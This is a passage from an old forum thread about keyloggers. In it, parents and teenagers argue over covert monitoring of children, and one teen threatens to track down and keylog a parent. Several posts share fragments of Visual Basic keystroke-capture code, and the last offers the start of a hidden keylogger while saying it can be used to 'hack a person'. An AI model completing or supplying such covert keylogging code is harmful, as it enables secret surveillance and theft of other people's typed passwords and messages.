Jump to content



Welcome to KnowledgeSutra - Dear Guest , Please Register here to get Your own website. - Ask a Question / Express Opinion / Reply w/o Sign-Up!
- - - - -

Key Logger.


49 replies to this topic

#41 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 22 November 2008 - 02:30 PM

kids and stuffKey Logger.

Replying to snlildude87

My kids are always on their computers, they dun let me use theirs as they feel I will know what they're doing, they're up all night, as a father, I have got my worries, on what pages they access to and what they are chatting and so with others, ive heard frm my friends keyloggers are the best, I want to know what they're doing all night, as a father I hop someone would understand my worry and help me out with it. I tried the actualspy, but that is only if I have access to their notebks. If I cant then there's no other way?

-reply by worrieddad



#42 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 18 December 2008 - 12:09 AM

SERIOUSLY!!!Key Logger.

FIRSTLY, This is directed to ALL of the parents here looking for a keylogger to implant onto your childs computer.

 

Me, as a 13 year old, know ALOT about computers, and I'm on it ALOT of the time. Scripting, Playing games, chatting with friends.

 Now if my mom (my dad can't even use the remote but my mom could find out how to plant a keylogger In a lil bit) implanted a keylogger in my computer. If I found out that my personal conversations were being looked at, I would go on a damned rampage!

 Thats really low spying on your children! Really, lets say that their friend is going through a rough time at home or something and they decided to tell your child, and then you read it. 

 And knowing you discusting sorry excuses for parents, you would probably read it. And God knows you wouldn't keep it a secret, why would you care about it hmm? Pathetic!

 What I should do is email you, track your IP, find out where you live, get your phone number and call you and tell your children that you are looking for a keylogger to put on there computer!

 Really pathetic.

 And after that, Ill put a keylogger onto YOUR computer, so that way when you go somewhere on your computer (Most likely porn, Hypocryte!) I'll know and have a good laugh at it.

 

 

Honestly, if you want to find out what your children are doing, have a sit down with them, and talk about it. And don't use that sickening "I want to know who they are talking to." Excuse! Really, with all the pedephiles there are out there, yes there are alot of stories about children getting taken away, raped or killed or both. But you have to realize that your children do have a conscience and that if you do let them have a bit of freedom with there computer that this sort of thing won't happen.

 

CLEARLY A bit of freedom dosen't refer to "Hi Mister Person I just met, heres my address & phone number and the times that my parents aren't here and I'm home alone.".  But really, my parents NEVER do that with me, I have my laptop in my room and I have a router and I don't do bad stuff like that.

 Plus most of the time, if my mom comes inside my room, she to start a conversation She'll say "Whatcha up to?". And sometimes I spin my laptop and say "playing runescape" or ill hide it and say "Me and my friend are talking about something private, one sec." and ill minimize and see what she wants.

 But really. Back to the main problem. 

 Keyloggers and filthy, discusting, and really have no good uses. I've had moments where I've been on the verge of emailing a jerk in my class a photo or client for a game and implanting on there and making it invisisble. But I realize that karma is a ***** and that I wouldn't want it to happen to me.

 

 

-reply by Hillsidenights

#43 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 01 February 2009 - 09:29 PM

Be a parent.  TAKE THE ADMIN RIGHTS.  Install the software.  Feel free to tell them its on there.  Check the logs routinely.  If you show up to check the machine and it's not on there, TAKE AWAY THE PC.  You are the parent.  Act like it.  If they can't use the PC abiding by your rules, then they lose that privilege.  I'm, chat etc, is a privilege not a right.  As is PC usage.  Don't worry about hiding it, let them know it's there and let them know you're checking on  them.  They may h8 you 4 it now, but when they grow up, they'll appreciate it.  Particularly when their kids start acting like 13 year-olds should have privacy.



#44 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 16 March 2009 - 10:29 AM

Can Somebody Tell me how to save the letters

 

Heres my program for VB 6.0:

 

Private Sub Command1_KeyPress(KeyAscii As Integer)Text1.Text = Chr(KeyAscii)End Sub

But the prob is that

 1. The text is within VB itself

 2.It dosent save all the letters. For example if I tpe Hello, the text1 will show H.Then replace that with E then replace the E with L And so In the end all I will see is "O".

 

Please help me someone!

 

-reply by Author Name - e.G. John, MikeKeywords: how to make a keylogger using visual basic

#45 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 08 May 2009 - 12:26 PM

@ iGuest - Re: saving lettersKey Logger.

 [font=" Verdana; font-size: 13px"]Text1.Text = Chr(KeyAscii)This gives you an "H", then an "e", right?This is because everytime a key is pressed, the code runs and overwrites your KeyAscii variable.[/font]

Instead try Text1.Text = Text1.Text + Chr(KeyAscii)

With this, instead of having "H" then "e" then "l" and so on, you will get H + e + l + l + o or in non-psudo code: "Hello"Hope I answered your question, don't hesitate to ask for more help. :-)

-Jack (Well, thats my web name at least)

-reply by Jack Spencor

 



#46 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 15 May 2009 - 02:02 PM

Hillsidenights - Not to start an arguement here, but seriously?  You're obviously a naive kid.  You say you don't do "bad stuff", but at the same time you threatened to do some pretty dumb stuff to worrieddad.  IF you actually could do what you threatened (which I doubt) and IF you acted on those threats, the FBI would kick in your door to arrest you.  What you described would be felony hacking (probably across state lines).  If you actually made any phone calls in the process...They'd probably throw in a stalking charge for good measure.  Since you're 13, you might end up in a juvenile delinquents home, but you'd probably end up staying at home with your parents.  You would have some form of probation until you were in your 20s that either didn't allow you to have access to either an internet connection or if the judge was really trying to teach you a lesson, you might not be allowed to touch a computer at all.  Good luck getting through high school without being able to type up your book reports!  Oh...And since you have that felony on your record...The best college option you'll have will be the local community college (and don't hope for any financial aid).



#47 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 21 July 2009 - 06:18 AM

HillsidenightsKey Logger.

 Well wow we have quite the teenage angst issue going on with our friend Hillsidenights. Let me respond to your poorly constructed jumble of a comment by first saying, if you must post a novel on a forum please use correct spacing, spelling, basic grammar, etc. Also your hypothetical response to your parents monitoring you with a keylogger demonstrates your strange and very unhealthy relationship with your parents. To say that you would go on a rampage because your parents monitored the computer they most likely purchased for you with their money earned from their jobs merely attests to your immaturity and selfishness. If a parent purchases a computer they have the right to do with it as they please because it is  their property, not yours. Conversely, if you did purchase your own computer you still are operating it in their house, (hopefully) following their rules and connecting to the internet service they pay for. 

In addition, throughout your post, your arguments were based on speculation and opinion rather than facts. For example, "[font=" Arial; font-size: 13px"]Keyloggers and filthy, discusting, and really have no good uses[/font]

In summary, please respect your parents and their property and how they wish to treat that property.

-reply by terrapin

#48 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 01 January 2010 - 09:19 PM

hey, I have an idea for you! okay, I don't know how to savetext into a file, butI know how you can save all of the text as a single variable.

 Heres your code :

Private Sub Command1_KeyPress(KeyAscii As Integer)Newkey = Chr(KeyAscii)Prevkeys = keystringKeystring = prevkeys + newkeyText1.Text = keystringEnd Sub

This code needs 3 string variables to be created "newkey" "prevkeys" and "keystring", and it will keep adding 1 letter to "keystring" each time you enter one :)

Hope I helped, I'm gonna look up how to save text into files later..

-reply by Insaniak

#49 Papabear

    Newbie [Level 1]

  • Kontributors
  • Pip
  • 10 posts

Posted 28 May 2011 - 08:50 AM

I'm still waiting for a tutorial on how to do this, still, no one is posting >.< Can I have
a tutorial site where I could learn on how to code this?

I like a keylogger that would run on the background process and hidden, starts on startup.
then everyday it emails all the key logs that have been made in a day? is that possible?

#50 Guest_Harish Jose_*

  • Guests

Posted 03 December 2011 - 01:06 PM

View PostZubair1, on 13 November 2004 - 08:23 PM, said:

Hi Pe Posted Image ple ,

Can Any One Tell me how to build a Keylogger on Visual Bais 6.0
that no one could see on the End Task Menu

This is a simple script for vb6. you can store all keys typed by a user. you only need to do some simple steps.
if you are making this program to run on startup it stores all keys. through this you can even hack a person.
its an amazing !!!


1. open visual basic and start a 'standard form'.
2. add a timer, one text box to the form.
3. make form visibility hidden.
4. copy the below code to code window.

.............................................................................................

Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Private Sub Form_Load()
App.TaskVisible = False 'makes your form invisible from user
End Sub

Private Sub Timer1_Timer()
For i = 32 To 128 'Changed to 32 to 128
result = 0

for complete code visit www.extracoding.blogspot.com




Reply to this topic


This post will need approval from a moderator before this post is shown.

  


1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users